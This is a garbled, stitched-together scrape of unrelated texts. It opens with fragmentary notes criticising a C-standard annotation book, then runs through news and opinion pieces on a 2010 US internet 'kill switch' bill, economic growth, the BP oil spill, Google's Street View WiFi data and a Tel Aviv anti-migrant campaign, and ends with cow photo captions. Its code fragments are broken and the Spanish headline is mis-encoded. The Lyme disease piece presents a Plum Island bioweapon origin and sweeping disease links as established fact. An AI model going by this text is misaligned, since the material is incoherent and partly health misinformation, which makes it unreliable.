Unfortunately , the standard states that " %f " is the correct format for a double , and " %lf " is undefined .
This is a particularly bad sin because the description of the " l " flag is missing ( left page 132 of the book is a repeat of page 131 ) .
While I cannot of course just copy the missing text , I have summarised what has been lost separately .
7.9.6.2
fflush ( stdin )
## /* clear crlf from input buffer */
7.9.7
unsigned char
The first example calls fgetc ( ) and assigns the result to a char variable .
This means that an error or end - of - file will cause the program to loop forever .
7.9.10.2
##
The following fragment illustrates how files are commonly read :
## do {
## ch = fgetc ( fp ) ;
## /* ... */
## } while (! feof ( fp ) ) ;
feof ( )
EOF
" feof
( fp ) "
ch
EOF
EOF
feof ( )
7.9.10.3
## Also , for files opened for binary operations , EOF is a valid
## binary value and does not necessarily indicate an error or
## end - of - file condition .
char
int
fgetc ( )
fgetc ( )
EOF
It is true that EOF , cast to the type unsigned char , is identical to a value that can be read from a binary file ( or even a text file ) .
However , this is just the effect of bad programming ; anyone with experience in C file handling should be aware of this .
7.10.1
## Also , remember that if the string does not contain a valid
## numeric value as defined by the function , then 0 is returned .
## Although strtod ( ) , strtol ( ) , and strtoul ( ) set errno when an
## out - of - range condition exists , there is no requirement that
## errno be set when the string does not contain a number .
Thus ,
## if this is important to your program , you must manually
## check for the presence of a number before calling one of the
## conversion functions .
* endptr
nptr
7.10.2
time_t
time ( )
long
double
time ( )
unsigned int
time_t
unsigned int random_from_time ( time_t t ) { unsigned int i , j , k ; char * p ; i = 0 ; p = ( char *) &t ; /* Divide t up into pieces each the size of an unsigned int */ for ( k = 0 ; k + sizeof j <= sizeof t ; k += sizeof j ) { /*
Copy the bits of the piece into j and add the value to i */ memcpy ( ( char *) &j , p + k , sizeof j ) ; i += j ; } /*
Do the same with any remnant ( e.g. if j is 4 bytes and t is 11 ) */ if ( k < sizeof t ) { j = 0 ; memcpy ( ( char *) &j , p + k , sizeof t - k ) ; i += j ; } return i ; }
7.10.7 and 7.10.8
## Since multibyte characters are implementation - specific , you
## should refer to your compiler 's user manual for details .
7.11.4
strxfrm ( )
strxfrm
The example compares two arrays of floats using memcmp .
While such a comparison is strictly conforming , it is not useful - the result of the comparison depends on the details of the encoding of floats , and is in no way related to which number is greater or smaller .
( For example , it is possible to have an encoding in which 0 < 2 , but 2 > 3 , as far as this comparison works .
In the same way , comparing integers with memcmp is equally useless on a little - endian system . )
7.12.2.3
mktime
mktime
Senate bill would authorize US president to seize control of Internet
By Mike Ingram
24 June 2010
A bill introduced by Joseph Lieberman , Independent Senator from Connecticut and Homeland Security and Governmental Affairs Committee Chairman , would give the US president wide - ranging powers , including the ability to order Internet providers to restrict access to the global network .
The bill , entitled the “ Protecting Cyberspace as a National Asset Act ” ( PCNAA ) , was presented in the Senate June 10 by Lieberman , with the support of Republican Susan Collins of Maine and Democrat Tom Carper of Delaware .
Known by the short name “ Protecting Cyberspace , ” the bill has been dubbed an Internet Kill Switch as it presents the Internet itself as a US national asset , over which the president would be given extraordinary powers in a declared “ cyber emergency . ”
Under PCNAA , already extensive powers to force private companies to comply with emergency decrees would be greatly expanded .
Any company on a list created by the Department of Homeland Security that also “ relies on ” the Internet , telephone system , or any other component of the US “ information infrastructure ” could be taken under the control of a proposed new National Center for Cybersecurity and Communications ( NCCC ) , which would be a section of Homeland Security .
A June 10 press release from the Senate Committee on Homeland Security and Governmental Affairs claims , “ The bill authorizes no new surveillance authorities and does not authorize the government to ‘ take over ’ private networks . ”
But in defending the bill , Lieberman said the president should be able to “ say to an electric company or to say to Verizon , in the national interests , ‘ There ’s an attack about to come and I hereby order you to put a patch on this , or put your network down on this part , or stop accepting any incoming [ traffic ] from country A , ’ ” CNET news reported .
The Obama administration has so far stopped short of endorsing Lieberman ’s bill , but Philip Reitinger , Deputy Undersecretary for the Department of Homeland Security , said that he agreed the executive branch “ may need to take extraordinary measures . ”
He preferred to have a single organization — that is , an arm of the DHS , rather than a new office — handle physical and Internet infrastructure .
Reitinger pointed out that the 1934 Communications
Act already gives the president broad emergency power .
“ Congress and the administration should work together to identify any needed adjustments to the act , as opposed to developing overlapping legislation , ” he said .
Under the 1934 act , the president may , under “ threat of war , ” seize control of any “ facilities or stations for wire communications . ”
Though dated , that definition would clearly apply to broadband providers or Web sites .
Anyone disobeying a presidential order can be imprisoned for one year .
In addition to making explicit the inclusion of Internet providers , a central component of the Lieberman bill is a promise of immunity from financial claims for any private company which carries through an order from the federal government .
The Lieberman bill is by no means the first attempt to impose restrictions on Internet access in circumstances when it is deemed to be in conflict with the interests of US imperialism .
The 2009 CyberSecurity Act introduced by Senators Jay Rockefeller ( Democrat from West Virginia ) and Olympia Snowe ( Republican from Maine ) proposed giving the president similar all - encompassing powers over the Internet .
In the end , the most controversial proposals were pulled from the 2009 bill and instead the act required US government agencies to prepare emergency contingency plans .
The push for new security measures ultimately comes from the White House itself .
In a May 2009 press statement , Barack Obama revealed that the servers of his campaign during the presidential election had been hacked and the hackers had “ gained access to emails and a range of campaign files , from policy papers to travel plans . ”
Choosing not to comment on who might be responsible for such an action , Obama claimed this was a powerful reminder that “ In this information Age , one of your greatest strengths — in our case , our ability to communicate to a wide range of supporters through the Internet — could be one of your greatest vulnerabilities . ”
The president stated that cybersecurity “ is a matter , as well , of America ’s economic competitiveness , ” asserting that “ E - commerce alone last year accounted for some $ 132 billion in retail sales . ”
The president declared , “ In short , America ’s economic prosperity in the 21st century will depend on cybersecurity . ”
Utilizing the kind of rhetoric most closely associated with the former Bush administration , Obama continued , “ Our technological advantage is a key to America ’s military dominance .
But our defense and military networks are under constant attack .
Al Qaeda and other terrorist groups have spoken of their desire to unleash a cyber attack on our country — attacks that are harder to detect and harder to defend against .
Indeed , in today ’s world , acts of terror could come not only from a few extremists in suicide vests but from a few key strokes on the computer — a weapon of mass destruction . ”
After pledging to “ secure America ’s information and communications networks , ” Obama went on to claim that none of this would infringe on the democratic rights of ordinary citizens .
“ Let me also be clear about what we will not do .
Our pursuit of cybersecurity will not — I repeat , will not include — monitoring private sector networks or Internet traffic .
We will preserve and protect the personal privacy and civil liberties that we cherish as Americans .
Indeed , I remain firmly committed to net neutrality so we can keep the Internet as it should be —open and free . ”
On the issue of monitoring private sector networks , it should be enough to point to the 3,580 data requests and 123 content removal requests made by the US government to Google between July 1 and December 31 , 2009 which we noted on the WSWS in April this year .
As for Obama ’s supposed defense of net neutrality , we have recently drawn attention to the attack on the WikiLeaks web site , which has published video coverage contradicting the US government ’s war propaganda .
( See “ Hands off WikiLeaks ! ” published June 14 . )
In an appearance on CNN’s State of the Union with Candy Crowley , Sen. Lieberman gave some insight into the real purpose of the proposed measures when he cited the example of China .
Invoking “ cybersecurity ” as the motivation for the bill , Lieberman said , “ So I say to my friends on the Internet , relax .
Take a look at the bill .
And this is something that we need to protect our country . ”
Lieberman said that “ Right now China , the government , can disconnect parts of its Internet in case of war and we need to have that here too . ”
China routinely shuts down or censors the Internet , not in response to war or “ national emergency ” but to social unrest and the threat posed by the emerging movement of the working class .
That Lieberman chooses this as his example is an acknowledgement of the real purpose of the measures he proposes .
As with all the attacks on democratic rights which have been carried through since 9/11 , first by the Bush administration then continued under Obama , the proposed bill has nothing to do with fighting terrorism .
Under conditions of increasing economic and social crisis , Lieberman longs for the type of repressive powers available to the regime in Beijing .
Otros siete funcionarios de Hermosillo fueron se�alados por una resoluci�n del ministro Arturo Sald�var ; es la primera investigaci�n en la que se involucra al director del IMSS , a casi un a�o del incendio
CIUDAD DE M�XICO | Martes 11 de mayo de 2010
Redacci�n | El Universal
08:31
ARROYO GRANDE , Calif. ( MarketWatch ) --
What do we do now , oh great Zen master ?
" When you get to a fork in the road , take it , " replies the wise one , Yogi Berra , greatest Yankee catcher of all time .
His sage advice to economists , politicians and investors everywhere : " The future ai n't what it used to be .
We made too many wrong mistakes .
You 've got to be very careful if you do n't know where you 're going , because you might not get there . "
At the crossroads : Growth !
Capitalism 's most sacred commandment -- " grow or die " -- may itself be on death row .
With us since 1776 , it 's being challenged by a new reality that 's flashing relentless warnings of an emerging new command from critics , contrarians and eco-economists : " Grow and die . "
Yes , you heard right .
" Grow or die . "
Traditional economists say we need 3 % GDP growth to support 100 million new Americans in the 21st century .
Drill , baby , drill .
New jobs to fuel slow recovery .
Worse , exploding growth demands as the rest of the world adds 2.9 billion new humans all chasing their unique American Dream .
" Grow and die . "
New eco-economists see Big Oil 's destruction of our coastal economies , the rape of West Virginia 's coal mountains , the unintended consequences of uncontrolled carbon emissions , and they ask : " When will economists , politicians and corporate leaders stop pretending world 's resources are infinitely renewable ? "
Unfortunately , even the new eco-economists fail to factor population growth , the big 800 - pound gorilla , into the equation .
Yes , we are all at a crossroads , all facing a dilemma , all confronting the ultimate no -win scenario : Growth is essential to support the global population explosion .
Growth is also killing our world , wasting our planet 's non-renewable natural resources .
As a result , the " growth " mantra will eventually destroy civilization .
Put a face on this dilemma : Governor Bobby Jindal .
Louisiana 's greatest economic and ecological assets -- marshlands , coastal fisheries -- are being destroyed by capitalism run amok , Big Oil 's greed .
Yet Jindal 's already telling the President to forget the oil drilling moratorium , forget new studies , forget regulations , forget restraining the Big Oil greed machine that got us here .
Drill baby drill , now !
Yes , we 're at the crossroads .
This politician 's a perfect example of the no-win scenario confronting all politicians , economists and citizens .
He 's on the horns of a very sharp no - win dilemma :
We 're damned if we grow .
Damned if we do n't .
Ultimate sin : Turning a blind eye , failing to seek real solutions
" When you get to a fork in the road ... take it . "
But which fork ?
Flip a coin ?
Same result either way : Heads you lose , tails you lose .
A no -win situation .
Not just Jindal , Obama and America , but Greece , Brazil and China .
All politicians , all economies , all trapped in capitalism 's most sacred , rarely challenged , commandment : Growth or die .
Growth has achieved biblical reverence , blinding us to its toxic collateral damage .
The difference between the mindset of traditional economists and the new eco-economists is actually simple : Traditional economists think short - term , react short - term , pursue short - term goals .
New eco-economists think long - term .
Initially this may seem overly simplistic , but it fits perfectly .
Here 's why :
Short - term thinkers : Traditional economists are highly - paid employees and consultants in organizations with short - term horizons -- banks , institutional investors , big corporations , think - tanks , government .
Quarterly earnings , tax season , election cycles are more important than what happens a decade in the future .
If they can't survive the next budget cycle , " long term " is irrelevant .
Long - term thinkers :
New eco-economists see , think and plan for the long - term .
They understand Yogi : " If you do n't know where you 're going , you might not get there . "
They know short - term thinkers are setting America up for more and bigger catastrophes than the gulf oil spill .
The hit film Avatar is a perfect metaphor :
By 2154 , Earth 's resources are exhausted forcing us to invade distant planets searching for new energy resources .
Critics warn it'll happen earlier : United Nations and Pentagon studies predict population increases that will create unsustainable new natural resources demands by 2050 .
Your ' growth ' test
The decision is yours .
So sit back for a few minutes , take this little test .
Read each of the following 11 news items from my clip files , edited for length .
Several are hot off the press .
A couple are from the winter months .
The rest from earlier reports about growth , the 800 - pound gorilla hiding in every nation 's living room in every quarterly economic report , in the expectations that will make - or - break your own retirement plans .
Here 's how to keep score :
If you think the message of one of these edited news items supports long - term growth , give it three points .
Two points if it 's neutral .
And if it favors short - term growth plus has faith that technology and the American Spirit will take care of the long - term , add one point .
Your total score will be between 33 and 11 .
1 . " Most new jobs temporary ... unemployment high , " Peter Morici report , June 2010
" The economy added 431,000 jobs in May but 411,000 were temporary Census jobs .
...
Forecasters had expected 540,000 new jobs ... the big challenge is to keep GDP growing at least 3 % to pull down unemployment . "
2. " OECD raises forecast for economic growth , " The Wall Street Journal , May 2010
The Organization for Economic Cooperation and Development , the Paris - based think tank , " cited strong growth in developing economies and the rapid rebound in world trade to predict that the organization 's 31 members will see their combined gross domestic product increase 2.7 % this year and 2.8 % next year .
... U.S. economy is expected to grow 3.2 % " in each of those years . "
3 . " Geithner rallies Europe on growth , " Ian Talley , The Wall Street Journal , May 2010
Geithner 's " growth " pitch is a fight to minimize change and preserve the status quo for American banks :
" We all understand that part of recovery , part of growth , is to make sure that we make clear and credible commitments to restore gravity to our fiscal positions over time ...
But we 're also working to make sure our economies are growing . "
4. " Economic outlook : Slow growth at best , " Gary Shilling 's Insight Report , June 2010
" Our forecasts of slow U.S. growth through 2011 may prove overly optimistic ...
Most investors believe 2008 was simply a bad dream from which they 've now awoken .
We 're returning to the world they knew and loved , with free - spending consumers supporting rapid economic growth , fueled by ample credit and backstopped by governments . "
5 . " The new normal , " Pimco 's Bill Gross , InvestmentNews Conference , Dec. 2009
" Investors will never again see the returns and profits of a few years ago .
' New normal ' returns are half what we have grown used to over the past 10 to 25 years . "
6 . " Stiglitz urges end to GDP fetish , " Bloomberg News Report , Sept. 2009
" The Nobel Prize - winning economist urged world leaders to drop the obsession with GDP and focus more on broader measures of prosperity . "
Many things important to individuals are not included in GDP .
But will short - term thinkers agree ?
7 . " Numbers racket , " Kevin Phillips , Harper 's Magazine , May 2008
" The use of deceptive statistics has played a vital role in convincing many Americans that the U.S. economy is stronger , fairer , more productive , more dominant , and richer with opportunity than it really is . "
Corruption taints CPI , GDP , unemployment stats .
How bad is it ?
The real numbers are a face full of cold water .
" Economic growth since the recession of 2001 has been mediocre , despite a surge in wealth and incomes of the superrich . "
8 . " A darker future for us , " Robert Samuelson , economist , in Newsweek , Nov. 2008
" We Americans are progress junkies .
We think that today should be better than yesterday and that tomorrow should be better than today .
Compared with most other peoples , we place more faith in ' opportunity ' and ' getting ahead . '
We may now be on the cusp of a new era that frustrates these widespread expectations .
...
Americans do not have a divine right to rapid economic growth . "
9 . " How a new jobless era will transform America , " Don Peck , The Atlantic , March 2010
" The Great Recession may be over , but this era of high joblessness is probably just beginning .
Before it ends , it will likely change the life course and character of a generation of young adults .
It will leave an indelible imprint on many blue - collar men .
It could cripple marriage as an institution in many communities .
It may already be plunging many inner cities into a despair not seen for decades .
Ultimately , it is likely to warp our politics , our culture , and the character of our society for years to come . "
10 . " Faustian economics , " Wendell Berry , Harper 's Magazine , May 2008
" The general reaction to the apparent end of the era of cheap fossil fuel , as to other readily foreseeable curtailments , has been to delay any sort of reckoning ...
The dominant response , in short , is a dogged belief that what we call the American Way of Life will prove somehow indestructible .
We will keep on consuming , spending , wasting , and driving , at any cost to anything and everybody but ourselves . "
11 . " What 's so good about growth ? " Michael Mandel , BusinessWeek book review , Nov. 2005
Ben Friedman 's " The Moral Consequences of Economic Growth " " has scored a dead - center hit on the critical question :
Why do we value economic growth ?
The usual argument is that a bigger GDP -- more goods and services -- leads to happier , more satisfied citizens ... [ But ] as the average income in a country goes up , so do expectations .
As a result , the level of GDP per person in a country , taken alone , does n't necessarily say much about the level of happiness .
The lack of a direct link between personal satisfaction and the level of GDP per person seems to undercut the purely economic arguments in favor of growth . "
Add it up
So what 's your total score ?
Folks in the " grow and die " crowd ( long - term thinkers and eco-economists ) will score above 22 .
Anyone in the " grow or die " crowd ( short - term thinkers and traditional economists ) will score under 22 .
Me ?
I 'm still at the plate talking to Yogi about that fork in the road , about Avatar in 2154 , about why God let that bad umpire 's call kill a perfect game .
Yes , still asking the wisest of all Zen masters which way to go .
And after he repeats his answer for the umpteenth time , he pauses , then silently shakes his head , turns away and walks off the field and into the dugout .
He caught a perfect game , and scored 33 points .
Abschließen des Bohrlochs mit Stahlkuppel gescheitert Florian Rötzer
Seit Beginn der Ölkatastrophe hat die Obama - Regierung weitere Ausnahmen der Umweltprüfung für Tiefseebohrungen erteilt
In einem eher verzweifelten Versuch , das Bohrloch im Golf von Mexiko zu schließen , hat der Ölkonzern BP am Donnerstag eine 100 Tonnen schwere Stahlkuppel im Meer zu versenken .
Die Idee war , sie über dem Bohrloch von Deepwater Horizon in einer Tiefe von 1.500 m unter dem Meeresspiegel anzubringen und dann das ausströmende Öl über eine Steigleitung abzupumpen .
Bei Erfolg wollte man auch das noch verbliebene zweite Loch mit einer kleineren Kuppel schließen .
Bislang laufen täglich etwa 800.000 Liter Öl ins Meer .
Die Stahlkuppel wird im Meer versenkt .
Bild : U.S. Coast Guard
Die Verantwortlichen von BP hatten sicherheitshalber erklärt , dass der Erfolg der Aktion unsicher sei , weil man bislang Derartiges noch nie in dieser Tiefe gemacht habe .
Wie die New York Times berichtet , scheint die Aktion aber am Samstag erst einmal gescheitert zu sein .
Die Kuppel war zwar über dem Bohrloch angebracht worden , doch strömten unerwartet viele Gashydrate , die sich unter hohem Druck und tiefer Temperatur bilden können , unter diese .
Die Kuppel begann in die Höhe zu treiben , überdies verschlossen die Gashydrate den Austritt an der Spitze der Kuppel .
Beides ließ sie unwirksam werden , so dass sie wieder entfernt und in der Nähe auf dem Meeresboden abgestellt wurde .
BP - Manager Doug Suttles erklärte , er würde zwar nicht von eine Scheitern sprechen wollen : " Aber was wir letzte Nacht versucht hatten , funktionierte nicht . "
Jetzt müssen schnell Alternativen gesucht werden .
Versucht wird , das Loch durch eine neue Bohrung kontrollieren zu können .
Das kann aber noch dauern , vermutlich mehr als 2 Monate .
Inzwischen wird weiter versucht , das Öl kontrolliert abzubrennen und Schutzschläuche vor den Küsten auszulegen , was aber nur einen gewissen Sinn macht , so lange das Meer einigermaßen ruhig ist .
Von russischer Seite kam der verwegene Vorschlag , das Bohrloch mit einer Atombombe zu schließen .
Vorhersage für die Ausbreitung des Ölteppichs .
Bild : NOAA
US - Innenminister Ken Salazar hatte angekündigt , dass zumindest bis Ende Mai ein Moratorium für weitere Bohrungen vor der Küste beschlossen worden seien .
Aber anscheinend sieht man das doch nicht so eng , was man auch schon wieder zugeben musste .
Wie Center for Biological Diversity herausgefunden hat , wurden seit Beginn der Ölpest am 20 .
April Öl - und Gaskonzernen bereits 27 neue Ausnahmen genehmigt , Tiefseebohrungen durch Umweltstudien zu überprüfen .
Das betraf auch wieder eine Versuchsbohrung von BP und war auch so der Fall bei der Bohrung von Deepwater Horizon gewesen .
Es sei unglaublich , so die Umweltorganisation , dass gerade die vielleicht größte Ölkatastrophe in der US - Geschichte geschieht , aber die zuständige weiter Genehmigungen aufgrund der Versicherung der Konzerne erteilt , dass
Öl nicht austreten kann und es auch nicht gefährlich wäre , wenn dies geschähe .
About the author
( NewsTarget )
As more is being discovered about Lyme disease ( LD ) , its true contagious nature and the origins of its bacterial infections , more suspicions have compounded about a Plum Island bioweapons lab being the source of Lyme disease .
Plum Island is just off the tip of Long Island , a stone 's throw from the Lyme , Connecticut area where the disease was first reported in 1975 .
The pathogen responsible for LD is , the wiggly form of Bb .
It is a cell wall deficient ( CWD ) bacteria , which makes it difficult to destroy since most antibiotics function by destroying the cell walls of bacteria .
It has been believed that Lyme disease was transferred only from insect bites , mostly ticks .
But evidence has emerged for many to believe otherwise .
Though infected insects may be the point of initial transfer to humans , there have been babies who were born with Lyme disease because of the mothers ' infection .
A few families have a majority of family members with LD .
Were they all bitten by insects ?
One researcher has discovered Bb in tears , so wiping one 's eyes could spread it manually .
A few medical research scientists and doctors have discovered Bb in virtually all studied victims of Parkinson 's Disease , Alzheimer 's , fibromyalgia , and others .
How many other chronic degenerative diseases , often with neurological symptoms , can be related to this Bb pathogen ?
Remember , LD mimics many diseases .
There are several doctors and researchers who believe that LD or the Bb pathogen has contaminated millions internationally , but most of them have been diagnosed with standard neurological or degenerative diseases .
Many methods of Bb contamination in addition to tick bites have been exposed since 2000 .
So we have a mysterious pathogen that mimics many diseases , making it difficult to diagnose , is difficult to isolate and destroy , is contagious , and incapacitates all those infected .
That certainly fits the criteria of an effective bioweapon Plum Island is where Lab 257 has been located since 1954 , ostensibly for animal viral research .
That soon morphed into bioweapons research , which was supposedly canceled by Richard Nixon in 1969 .
But later documents revealed that bioweapon research had continued in secrecy .
Plum Island is the open air laboratory for Ft. Detrick , the notorious bioweapon center in Maryland .
From NY attorney Michael Carroll 's book , : " Plum Island presents more vectors for the spread of infectious disease than perhaps anywhere else .
Ticks [ there ] have a long and varied menu : droves of small foraging birds ... a tantalizing wild deer habitat , and thousands of mice and rats for tick larvae and nymphs to feed on .
Plum Island is a Lyme disease tinderbox .
" Lone Star hard ticks , formerly indigenous only to Texas , suddenly proliferated in the Long Island / Connecticut area right around the time LD broke out .
No one could explain how they suddenly migrated there .
Hard ticks are bioweapon researchers ' ticks of choice for spreading pathogens to wild life .
Despite government denial , there have been some discoveries concerning bioweapon research on mycoplasma , living particles of bacterial nucleic acid without cell walls , pointing to Plum Island 's involvement with LD .
Some US government scientists hold a patent on a pathogenicconverted into a crystalline form .
Attorney Michael Carroll , knowledgeable health experts , and LD victims consider infected insects or birds released inadvertently or intentionally from Plum Island as the source of worldwide Lyme disease in all its disguises .
Dr. James Howenstine 's article on LymeLyme as BioweaponPlum Island , Yale , and Lyme DiseaseLiving Next Door to Plum IslandBuilding 257 history Paul Fassa is dedicated to warning others about the current corruption of food and medicine and guiding others toward a direction for better health with no restrictions on health freedom .
You can visit his blog at http://healthmaven.blogspot.com
Google is pushing back against regulators who have demanded access to the 600 GB of WiFi payload data the company accidentally collected through its Street View cars .
Officials in both Germany and Hong Kong rushed to ask for the data after Google announced plans to destroy it , but Google has yet to heed their requests , saying that it needs more time to evaluate the legal ramifications of turning the data over .
" As granting access to payload data creates legal challenges in Germany which we need to review , we are continuing to discuss the appropriate legal and logistical process for making the data available , " Google spokesperson Peter Barron told the New York Times .
Essentially , the company believes Germany 's own privacy laws may prevent Google from turning the data over — after all , part of the reason for the law is to protect citizens from the government .
The reasons Google blew off a Monday deadline given by Hong Kong privacy commissioner Roderick B .
Woo were less clear — Google did n't make any statements related to Hong Kong — but it 's likely that they are similar .
Officials from both countries are understandably frustrated with Google 's stance ; Hamburg data protection supervisor Johannes Caspar said there was " no apparent reason " for Google to withhold the data , while Woo accused Google of being insincere .
Google is stuck between a rock and a hard place with this one , and the furor over the data keeps growing .
Google does n't just have Germany and Hong Kong on its back either — certain members of Congress want to know what the FTC is doing to look into the situation , and a class - action lawsuit has been filed against Google , too .
Simply deleting the data certainly seems like the most painless way out for all involved — Google has already done exactly this for data collected in Denmark , Ireland , and Austria — but it 's clear that several countries want to know exactly what information Google collected on its citizens before wholesale deletions can take place .
Update : A US District Judge in Oregon has ordered Google to turn over copies of the data it collected within 10 days .
Here 's a series of 1950s - vintage videos illustrating the workings of mechanical Navy ballistics computers — enormous arrays of switches and gears that are used to quickly and reliably do complex mathematics in response to changing wind , targets and other factors .
It 's a really good , easy - to - follow guide to the underlying logic in a computer , and it 's excitingly mechanical .
u.s navy vintage fire control computers ( part 1 )
( Thanks , Harold D and everyone else who suggested this ! )
What began with graffiti is now turning into an active campaign supported by public officials .
Graffiti slogans in support of deporting foreign migrants have become a common spectacle on the streets of south Tel Aviv .
According to information obtained by Ynet , the slogans are now turning into an actual campaign aimed to prevent infiltrators and foreign refugees from living in the city 's southern neighborhoods .
Clashing Interests Contractors to High Court :
Do n't deport migrant labor Tani Goldstein Government intends to deport 3,000 migrant laborers , but employers say not enough Israelis willing to build , decision harms entire economy Contractors to High Court :
Do n't deport migrant labor
Babayoff drafted a special notice titled " Banning apartment rentals to infiltrators . "
In the notice , the councilman writes : " It should be known that is strictly forbidden to rent apartments to gentiles , as explained in the Talmud .
" According to police figures , in places where illegal infiltrators live , crime rates have increased significantly , and they are responsible for 40 % of criminal offences .
Five murders were committed by infiltrators only during the past year , " the notice read .
Babayoff also waved the real estate card , saying that " according to precedents from around the world , areas inhabited by Africans experience a significant decrease in the value of apartments . "
At the bottom of the notice , Babayoff wrote : " We , the undersigned , neighborhood and synagogue Rabbis , warn the public of the imminent danger caused by renting houses to these people !!! "
' Refugees bring filth , crime '
The councilman explained that he and 25 other activists intend to distribute the notice to apartment brokers and post it on bulletin boards across the city .
If that does n't help , he said , they will go out on the street and protest once a week .
" In conversations I 've had with senior rabbis from the south of the city , I was told they were displeased with the deterioration of filth and crime that have taken over the streets in the past year , because of these refugees , " Babyoff told Ynet .
" Why do law - abiding veteran residents need to suffer because of this ?
People are scared of walking on the streets at night , " he added .
Shelter for Sudanese refugees ( Archive photo : Tamar Dressler )
Babayoff is not concerned with being called a racist .
" I want to ask those bleeding hearts that say this is racism , if they would be willing to live in a building with three Sudanese refugees across the hall ?
" It 's easiest to toss them in the neighborhoods of the south instead of finding a solution .
They bring filth and vandalism and frighten the other residents .
I am wiling to have them dispersed throughout the entire city – let them live in the northern neighborhoods of Bavli , Maoz Aviv and Ezori Chen , " he said .
Meanwhile , City Council Chairman and former Member of Knesset Yael Dayan slammed the initiative , calling it " completely racist and illegal . "
Dayan noted Babayoff " holds public office as an elected representative of the public and the neighborhood rabbis are paid by public wages .
It is an incitement toward a public that has done him no harm , and is based solely on race and religion , " she said .
According to Dayan , the violence Babayoff speaks of takes place mainly among the refugees .
" 90 % of the cases are internal rifts between those who have no jobs .
They look for temporary employment and sometimes resort to alcohol and brawls . "
Dayan also slammed those who take advantage of the refugees ' hardship , " Landlords have Exploited the situation by increasing rental prices , and forcing six foreign migrants to live in one room , only so they can increase their profits . "
Shush .
There 's something back there .
Which way did they go ?
PHOTO HIGHLIGHTS
Taking a break .
I do n't mind posing for photos .
Let 's do the Hokey Pokey .
Perfectly framed ..
Let 's play music on my lyre .
Warm feet and still - green grass .
My mom keeps me all shiny .
This line 's too slow .
I am smiling . ;-)
I do n't wear my heart on my sleeve .
It 's so peaceful when the babies are n't pestering us .
Green grass makes our horns grow .
We 're comfy ..
Of course , I sparkle .
I 'm a pretty girl .
( FP Cow ) .
I 'm a real sweetheart .
You can't sneak up on me .
Nonchalant .
That 's me .
I think she left the blur filter on .
Lookit me .. I have freckles .
Babysitting .
Date night .
Ransom and Typhoon .
The white stuff is persistent .
It 's in - between my toeses .
Finally !
Green stuff and sunshine .
We 're tired of the white stuff .
I sure show up against the white .
Who stands out in the cold to take pictures ???
I get good tv reception .
Brrrrr !
The sunshine helps .
A little .
La Dorada Mica , Foundation Pure Bull La Dorada Vexation , Foundation Pure Cow La Dorada Vexation is happy . ;-)
Splashy Baby Three Year Old Foundation Pure Cow Three Year Old 7/8 Cow Getting Breakfast .
Those first few steps are a doozy .
I 'm ready to go , but Mom wants a nap .
Snoozing .
The cow version of Grumpy Cat. LOL
Yep , all his cute little baby parts are there . ;-)
That 's a lot of white !
We all have dibs on the new lick tub !
I arrived wearing my own bow tie .
Young Show Steer Foundation Pure Cow Percentage Cow I 'm a natural blond .
A little shade in the afternoon is nice .
" Hey , there . "
Sunsplashed .
You looking ' at me ?
I 'm ignoring you .
LOL
We want this Christmas tree .
Heading into Winter. [ facepalm ]
No , I 'm not Trigger .
We have her back . ;-)
Colorful Percentage Cow Another view of my cute horn nubbins .
Native Pure Ankole - Watusi Cows Foundation Pure Ankole - Watusi Cow Look at my cute horn nubbins !
La Dorada Mica , FP Bull Is This My Good Side ? ( La Dorada Mica , FP Bull ) Maybe This Is My Best Pose !
( La Dorada Mica , FP Bull ) La Dorada Robin , FP Cow , Daughter Of Ridoro Chambezi La Dorada Mica , FP Bull , Son Of La Dorada Robin La Dorada Mica ( Son Of La Dorada Robin ) Lundgrens Triple Crown , Young FP Bull Foundation Pure Bulls Talk to the butt !
Foundation Pure Cow Foundation Pure Cow Foundation Pure Bull I smell a range cube .
( La Dorada Robin , FP Cow )
More range cubes !
( FP Cow ) Boy , that water looks great !
( FP Cow ) La Dorada Robin , FP Cow La Dorada Robin , FP Cow >
Ok , put the camera down or I 'm leaving .
Sunny March !
Are you still staring at me ?
Brome hay for breakfast .
Yum .
Foundation Pure Cow And Calf Foundation Pure Cows Eating Their Breakfast Hay La Dorada Zulu , Foundation Pure Cow Trust me , it 's still cold out here .
I do n't smell any new grass yet , but I keep hoping .
Finally .
A table for one !
It 's freaking cold out here !
I am heading to Florida .
The big guy is a good windbreak .
" We share with the younger guys . "
There 's no fighting over Thanksgiving dinner .
" This is WAY better than turkey . "
You lookin ' at me ?
Do I smell Halloween candy ?
That Halloween candy sure tasted good !
Peekaboo !
Manley says : " He 's behind me , is n't he ? " Foundation Pure Cow I get great tv reception .
I 'm hid !
My face has bunny ears !
Red roan , not palomino . ;-)
I 'm wearing camo .
Taking baby for a stroll .
I glow in the dark .
Yum , yum .
Who 's peeking through the fence ?
I get really good tv reception .
Dozing in the sunshine .
The Binder Park Zoo's " Lundgren " Steers .
Spiffed up for Spring .
Think there 's enough white ???
Snoozing in the sunshine .
My name is Coquette .
My horns look bigger , straight on .
LOL
Like my freckles ?
Foundation Pure Cows .
Nap Time .
Beth Lundgren Brushing A Steer .
Cold snow , warm hay .
What a blissful day .
What is with her and that camera ??
I 'm stunning !
Nice warm hay on a cold day .
Soaking up the sunshine .
Brace yourself , winter is coming .
Looking back at summer ...
Oh , well , time to look forward , to winter .
" You smell like Halloween candy . "
Yummy hay !
" Our Halloween hats are Haybale Couture . "
You smell ... like a range cube .
Foundation Pure Cow Give a girl a range cube !
Brand new baby boy .
Someone to waaaaaatch over meeeee .
I smell range cubes .
Gimme !
I 'm brand new , but I think I have too many legs to keep track of .
LOL
I 'm watching over him , so that 's close enough . ;-)
Did you get my best side ?
La Dorada Mica , FP Bull
Got any range cubes ?
Close Up. La Dorada Mica , FP Bull Gracie's Good At Scritching The Cows La Dorada Robin , FP Cow La Dorada Gale , FP Cow La Dorada Red Eagle , FP Bull La Dorada Robin , FP Cow Foundation Pure Cow Foundation Pure Cows Foundation Pure Cow La Dorada Mica , FP Bull Foundation Pure Cow La Dorada Typhoon , FP Bull , 17 Years Old
The children were nestled all snug in their beds ... Foundation Pure Cow
You can't catch meeeeee I 'm brand new !
A new baby 's first drink .
Baby on watch !
LOL I 'm sparkly !
I 'm not as big as I think , when Mom is standing up .
What are these things called " legs " ?
Oh , I found my legs !
Ha !
Try to outrun me now !
Parts of me are in camo .
You watch us ; we watch you .
I like my new home at the Toledo Zoo.
Baby - sitting is never glamorous .
I have my eye on you .
I 'm getting sleeeeepy .
Sur , a professional zoo steer . ;-)
Young Foundation Pure Cow Sur , a professional zoo steer .
;-)
Lundgrens Sur Prize before the Toledo trip .
Downward View Waiting For Spring Lundgrens Kurlee Lundgrens Sur Prize is ready to go to Toledo . LOL
